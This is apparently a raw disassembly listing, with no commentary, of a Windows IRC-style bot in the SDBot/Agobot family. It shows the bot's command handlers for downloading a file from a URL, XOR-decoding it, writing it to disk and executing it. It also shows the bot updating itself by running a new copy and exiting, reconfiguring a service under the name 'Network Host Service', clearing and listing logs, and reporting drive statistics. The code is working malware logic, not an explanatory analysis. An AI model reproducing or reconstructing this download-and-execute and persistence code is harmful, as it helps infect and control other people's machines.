push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_412E0D
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_401C33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CA7 proc near ; CODE XREF: sub_40779B+A4�p
; sub_4078FA:loc_40A8FB�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_80]
push 80h
push eax
call sub_412E64
lea eax, [ebp+var_80]
push eax
call sub_401C33
add esp, 14h
leave
retn
sub_401CA7 endp
; =============== S U B R O U T I N E =======================================
sub_401CD3 proc near ; CODE XREF: sub_4078FA+4512�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_42EFB8
xor ecx, ecx
loc_401CDA: ; CODE XREF: sub_401CD3+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_432FB8
jl short loc_401CDA
cmp [esp+arg_C], ecx
push esi
mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_401D0A
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_4045DD
add esp, 14h
loc_401D0A: ; CODE XREF: sub_401CD3+1F�j
push esi
call sub_401C33
pop ecx
pop esi
retn
sub_401CD3 endp
; =============== S U B R O U T I N E =======================================
sub_401D13 proc near ; CODE XREF: .text:0041296D�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_42EFB8
loc_401D19: ; CODE XREF: sub_401D13+27�j
cmp byte ptr [esi], 0
jz short loc_401D2E
push [esp+4+arg_0]
push esi
call sub_405AD5
test eax, eax
pop ecx
pop ecx
jnz short loc_401D40
loc_401D2E: ; CODE XREF: sub_401D13+9�j
add esi, 80h
cmp esi, offset dword_432FB8
jl short loc_401D19
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401D40: ; CODE XREF: sub_401D13+19�j
xor eax, eax
inc eax
pop esi
retn
sub_401D13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D45 proc near ; DATA XREF: sub_4078FA+45C9�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_401D98
push edx
push [ebp+var_14]
lea eax, [ebp+var_118]
push offset aLogBegin ; "[LOG]: Begin"
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401D98: ; CODE XREF: sub_401D45+33�j
cmp [ebp+var_98], 0
jz short loc_401DB8
lea eax, [ebp+var_98]
push eax
call sub_412F42
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_401DB8
mov [ebp+var_8], eax
loc_401DB8: ; CODE XREF: sub_401D45+5A�j
; sub_401D45+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_42EFB8
loc_401DC1: ; CODE XREF: sub_401D45+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_401E1B
cmp byte ptr [esi], 0
jz short loc_401E0A
cmp [ebp+var_98], 0
jz short loc_401DF0
cmp [ebp+var_4], 0
jnz short loc_401DF0
lea eax, [ebp+var_98]
push eax
push esi
call sub_405AD5
test eax, eax
pop ecx
pop ecx
jz short loc_401E0A
loc_401DF0: ; CODE XREF: sub_401D45+90�j
; sub_401D45+96�j
push edi
push [ebp+var_14]
lea eax, [ebp+var_118]
push esi
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401E0A: ; CODE XREF: sub_401D45+87�j
; sub_401D45+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_432FB8
jl short loc_401DC1
loc_401E1B: ; CODE XREF: sub_401D45+82�j
lea eax, [ebp+var_31C]
push offset aLogListComplet ; "[LOG]: List complete."
push eax
call sub_412BB5
xor esi, esi
cmp [ebp+var_10], esi
pop ecx
pop ecx
jnz short loc_401E55
push esi
push [ebp+var_14]
lea eax, [ebp+var_31C]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401E55: ; CODE XREF: sub_401D45+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_401C33
push [ebp+var_18]
call sub_4111AE
pop ecx
pop ecx
push esi
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_401D45 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E73 proc near ; CODE XREF: sub_405915+1E�p
; sub_40D1EF+34A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset aNetworkHostSer ; "Network Host Service"
loc_401E83: ; CODE XREF: sub_401E73+6F�j
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push off_42A354[edi]
push dword_42A350[edi]
call dword_4334E8
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_401EC9
lea edx, [eax+1]
loc_401EAD: ; CODE XREF: sub_401E73+3F�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_401EAD
sub eax, edx
push eax
push [ebp+arg_0]
push 1
push ebx
push esi
push [ebp+var_4]
call dword_433484
jmp short loc_401ED3
; ---------------------------------------------------------------------------
loc_401EC9: ; CODE XREF: sub_401E73+35�j
push esi
push [ebp+var_4]
call dword_4334DC
loc_401ED3: ; CODE XREF: sub_401E73+54�j
push [ebp+var_4]
call dword_43357C
add edi, 8
cmp edi, 18h
jb short loc_401E83
pop edi
pop esi
pop ebx
leave
retn
sub_401E73 endp
; =============== S U B R O U T I N E =======================================
sub_401EE9 proc near ; CODE XREF: sub_401F06+109�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_401F05
loc_401EF5: ; CODE XREF: sub_401EE9+1A�j
mov dl, byte_42AE5C
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_401EF5
locret_401F05: ; CODE XREF: sub_401EE9+A�j
retn
sub_401EE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F06 proc near ; DATA XREF: sub_4078FA+287E�o
; sub_4078FA+2D24�o
var_88C = qword ptr -88Ch
var_880 = qword ptr -880h
var_810 = byte ptr -810h
var_610 = byte ptr -610h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_38C = byte ptr -38Ch
var_28C = byte ptr -28Ch
var_18C = byte ptr -18Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
mov esi, eax
mov ecx, 0EAh
lea edi, [ebp+var_410]
rep movsd
push ebx
xor esi, esi
push ebx
inc esi
mov [eax+3A4h], esi
push ebx
lea eax, [ebp+var_38C]
push eax
push dword_4335E0
call dword_4334A8
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_4023B5
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_28C]
push eax
call ds:dword_41F03C
cmp eax, esi
mov [ebp+var_10], eax
jnb short loc_401FCD
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_401FB0
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_401FB0: ; CODE XREF: sub_401F06+88�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
push [ebp+var_8C]
call sub_4111AE
pop ecx
jmp loc_402416
; ---------------------------------------------------------------------------
loc_401FCD: ; CODE XREF: sub_401F06+68�j
xor esi, esi
call ds:dword_41F004
mov [ebp+var_4], eax
loc_401FD8: ; CODE XREF: sub_401F06+174�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+var_610]
rep stosd
lea eax, [ebp+arg_0]
push eax
push 200h
lea eax, [ebp+var_610]
push eax
push [ebp+var_C]
call dword_43354C
cmp [ebp+var_78], ebx
jz short loc_402016
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
call sub_401EE9
pop ecx
pop ecx
loc_402016: ; CODE XREF: sub_401F06+FD�j
push ebx
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
push [ebp+var_10]
call ds:dword_41F038
add esi, [ebp+arg_0]
cmp [ebp+var_80], ebx
jz short loc_40203B
cmp esi, [ebp+var_80]
ja short loc_402080
loc_40203B: ; CODE XREF: sub_401F06+12E�j
mov eax, esi
shr eax, 0Ah
push eax
lea eax, [ebp+var_38C]
push eax
mov eax, [ebp+var_8C]
imul eax, 234h
add eax, offset dword_434138
cmp [ebp+var_88], 1
jz short loc_402069
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_40206E
; ---------------------------------------------------------------------------
loc_402069: ; CODE XREF: sub_401F06+15A�j
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_40206E: ; CODE XREF: sub_401F06+161�j
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+arg_0], ebx
ja loc_401FD8
loc_402080: ; CODE XREF: sub_401F06+133�j
cmp [ebp+var_80], ebx
mov [ebp+var_8], 1
jz short loc_4020D5
cmp esi, [ebp+var_80]
jz short loc_4020D5
push [ebp+var_80]
lea eax, [ebp+var_610]
push esi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax
mov [ebp+var_8], ebx
call sub_412BB5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
lea eax, [ebp+var_610]
push eax
call sub_401C33
add esp, 28h
loc_4020D5: ; CODE XREF: sub_401F06+184�j
; sub_401F06+189�j
call ds:dword_41F004
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+var_10]
mov ecx, eax
inc ecx
mov eax, esi
div ecx
mov edi, eax
call ds:dword_41F034
cmp [ebp+var_8], ebx
jz loc_402402
cmp [ebp+var_88], 1
jz loc_4022C6
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_402121
fadd ds:dbl_41FAD8
loc_402121: ; CODE XREF: sub_401F06+213�j
test esi, esi
fmul ds:dbl_41FAD0
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_402143
fadd ds:dbl_41FAD8
loc_402143: ; CODE XREF: sub_401F06+235�j
fmul ds:dbl_41FAD0
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_402187
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_402187: ; CODE XREF: sub_401F06+25F�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
cmp [ebp+var_84], 1
pop ecx
jnz loc_402402
cmp [ebp+var_74], ebx
jnz short loc_4021F1
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadOpenni ; "[DOWNLOAD]: Openning: %s %s."
push eax
call sub_412BB5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
lea eax, [ebp+var_610]
push eax
call sub_401C33
add esp, 28h
loc_4021F1: ; CODE XREF: sub_401F06+29E�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_68]
rep stosd
mov ecx, 80h
lea edi, [ebp+var_810]
mov [ebp+var_5C], (offset asc_41FA74+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], 1
mov [ebp+var_38], bx
rep stosd
loc_40222A: ; CODE XREF: sub_401F06+335�j
mov cl, [ebp+eax+var_28C]
mov [ebp+eax+var_810], cl
inc eax
cmp cl, bl
jnz short loc_40222A
lea edi, [ebp+var_810]
dec edi
loc_402244: ; CODE XREF: sub_401F06+344�j
mov al, [edi+1]
inc edi
cmp al, bl
jnz short loc_402244
mov esi, offset asc_41FA74 ; " "
lea eax, [ebp+var_18C]
movsw
mov edx, eax
loc_40225B: ; CODE XREF: sub_401F06+35A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40225B
lea edi, [ebp+var_810]
sub eax, edx
dec edi
loc_40226B: ; CODE XREF: sub_401F06+36B�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_40226B
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_810]
push eax
and ecx, 3
push ebx
rep movsb
call ds:dword_41F030
cmp eax, 1
lea eax, [ebp+var_810]
push eax
lea eax, [ebp+var_610]
jnz short loc_4022BC
push offset aDownloadApplic ; "[DOWNLOAD]: Application succesfully exe"...
jmp loc_4023C7
; ---------------------------------------------------------------------------
loc_4022BC: ; CODE XREF: sub_401F06+3AA�j
push offset aDownloadExecut ; "[DOWNLOAD]: Execution failed: Error exe"...
jmp loc_4023C7
; ---------------------------------------------------------------------------
loc_4022C6: ; CODE XREF: sub_401F06+205�j
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_4022D6
fadd ds:dbl_41FAD8
loc_4022D6: ; CODE XREF: sub_401F06+3C8�j
test esi, esi
fmul ds:dbl_41FAD0
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_4022F8
fadd ds:dbl_41FAD8
loc_4022F8: ; CODE XREF: sub_401F06+3EA�j
fmul ds:dbl_41FAD0
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_40233C
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_40233C: ; CODE XREF: sub_401F06+414�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
xor eax, eax
pop ecx
lea edi, [ebp+var_24]
stosd
stosd
push 11h
stosd
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_28C]
xor esi, esi
push eax
inc esi
push ebx
mov [ebp+var_5C], (offset asc_41FA74+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], esi
mov [ebp+var_38], bx
call ds:dword_41F030
cmp eax, esi
jnz short loc_4023A7
call dword_4335B8
call sub_405915
push ebx
call ds:dword_41F02C
loc_4023A7: ; CODE XREF: sub_401F06+48D�j
lea eax, [ebp+var_28C]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_4023C1
; ---------------------------------------------------------------------------
loc_4023B5: ; CODE XREF: sub_401F06+45�j
lea eax, [ebp+var_38C]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_4023C1: ; CODE XREF: sub_401F06+4AD�j
lea eax, [ebp+var_610]
loc_4023C7: ; CODE XREF: sub_401F06+3B1�j
; sub_401F06+3BB�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_4023F5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_4023F5: ; CODE XREF: sub_401F06+4CD�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
pop ecx
loc_402402: ; CODE XREF: sub_401F06+1F8�j
; sub_401F06+295�j
push [ebp+var_C]
call dword_4334FC
push [ebp+var_8C]
call sub_4111AE
loc_402416: ; CODE XREF: sub_401F06+C2�j
pop ecx
push ebx
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_401F06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40241F proc near ; CODE XREF: sub_4078FA+4C27�p
; sub_4078FA+4D7A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4134AF
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40241F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402439 proc near ; CODE XREF: sub_40253D+66�p
; sub_40253D+97�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 0Ch
mov esi, offset dword_432FB8
pop ecx
xor eax, eax
mov edi, esi
rep stosd
stosw
lea edi, [ebp+var_40]
push ebx
loc_402459: ; CODE XREF: sub_402439+50�j
; sub_402439+56�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413500
add cl, 30h
mov [edi], cl
inc edi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_402491
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_402459
mov byte ptr [edi], 2Ch
inc edi
jmp short loc_402459
; ---------------------------------------------------------------------------
loc_402491: ; CODE XREF: sub_402439+40�j
mov eax, esi
pop ebx
jmp short loc_40249B
; ---------------------------------------------------------------------------
loc_402496: ; CODE XREF: sub_402439+68�j
mov cl, [edi]
mov [eax], cl
inc eax
loc_40249B: ; CODE XREF: sub_402439+5B�j
dec edi
lea ecx, [ebp+var_40]
cmp edi, ecx
jnb short loc_402496
and byte ptr [eax], 0
pop edi
mov eax, esi
pop esi
leave
retn
sub_402439 endp
; =============== S U B R O U T I N E =======================================
sub_4024AC proc near ; CODE XREF: sub_402658+3E�p
; sub_402658+74�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43342C
sub eax, 0
jz short loc_4024EF
dec eax
jz short loc_4024E9
dec eax
dec eax
jz short loc_4024E3
dec eax
jz short loc_4024DD
dec eax
jz short loc_4024D7
dec eax
jz short loc_4024D1
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_4024D1: ; CODE XREF: sub_4024AC+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_4024D7: ; CODE XREF: sub_4024AC+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_4024DD: ; CODE XREF: sub_4024AC+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_4024E3: ; CODE XREF: sub_4024AC+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_4024E9: ; CODE XREF: sub_4024AC+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_4024EF: ; CODE XREF: sub_4024AC+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_4024AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F5 proc near ; CODE XREF: sub_40253D+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_43349C
test eax, eax
jz short loc_40252A
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax
loc_40252A: ; CODE XREF: sub_4024F5+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_4024F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40253D proc near ; CODE XREF: sub_402658+17�p
; sub_40FE1F+1BD�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_4024F5
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_402615
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_402615
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_402615
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_412E0D
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_412E0D
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_412E0D
add esp, 18h
pop ebx
jmp short loc_402644
; ---------------------------------------------------------------------------
loc_402615: ; CODE XREF: sub_40253D+2C�j
; sub_40253D+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_412BB5
lea eax, [ebp+var_130]
push esi
push eax
call sub_412BB5
lea eax, [ebp+var_B0]
push esi
push eax
call sub_412BB5
add esp, 18h
loc_402644: ; CODE XREF: sub_40253D+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40253D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402658 proc near ; CODE XREF: sub_402717+B�j
; sub_402717+51�p
var_500 = byte ptr -500h
var_380 = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_40253D
pop ecx
pop ecx
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+var_180]
rep movsd
push 7
mov edi, offset aFailed ; "failed"
lea esi, [ebp+var_80]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4026B8
push ebx
push ebx
call sub_4024AC
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_412E0D
add esp, 14h
jmp short loc_4026EC
; ---------------------------------------------------------------------------
loc_4026B8: ; CODE XREF: sub_402658+3A�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_4024AC
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_412E0D
add esp, 20h
loc_4026EC: ; CODE XREF: sub_402658+5E�j
push 1
push [ebp+arg_8]
lea eax, [ebp+var_380]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_380]
push eax
call sub_401C33
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_402658 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402717 proc near ; CODE XREF: sub_4078FA+4268�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_402727
pop ebp
jmp sub_402658
; ---------------------------------------------------------------------------
loc_402727: ; CODE XREF: sub_402717+8�j
push ebx
push esi
push eax
push eax
call dword_43353C
lea esi, [eax+2]
push esi
call sub_41344D
pop ecx
mov ebx, eax
push ebx
push esi
mov [ebp+arg_C], ebx
call dword_43353C
cmp byte ptr [ebx], 0
jz short loc_40278A
push edi
loc_40274E: ; CODE XREF: sub_402717+6D�j
push 4
mov edi, offset aA ; "A:\\"
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_402770
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402658
add esp, 10h
loc_402770: ; CODE XREF: sub_402717+45�j
mov eax, ebx
lea edx, [eax+1]
loc_402775: ; CODE XREF: sub_402717+63�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402775
sub eax, edx
lea ebx, [ebx+eax+1]
cmp [ebx], cl
jnz short loc_40274E
mov ebx, [ebp+arg_C]
pop edi
loc_40278A: ; CODE XREF: sub_402717+34�j
push ebx
call sub_412FE4
pop ecx
pop esi
pop ebx
pop ebp
retn
sub_402717 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402795 proc near ; DATA XREF: sub_40D1EF+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_434344
call dword_4335AC
call sub_41105B
call dword_4335B8
call dword_4335B8
mov ebx, ds:dword_41F000
push 64h
call ebx
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_54]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_158]
xor edi, edi
push eax
mov [ebp+var_48], (offset asc_41FA74+2)
mov [ebp+var_54], 44h
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_41F040
push esi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_41F010
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_158]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_41F030
test eax, eax
jz short loc_402854
push 64h
call ebx
push [ebp+var_10]
mov esi, ds:dword_41F034
call esi
push [ebp+var_C]
call esi
loc_402854: ; CODE XREF: sub_402795+A9�j
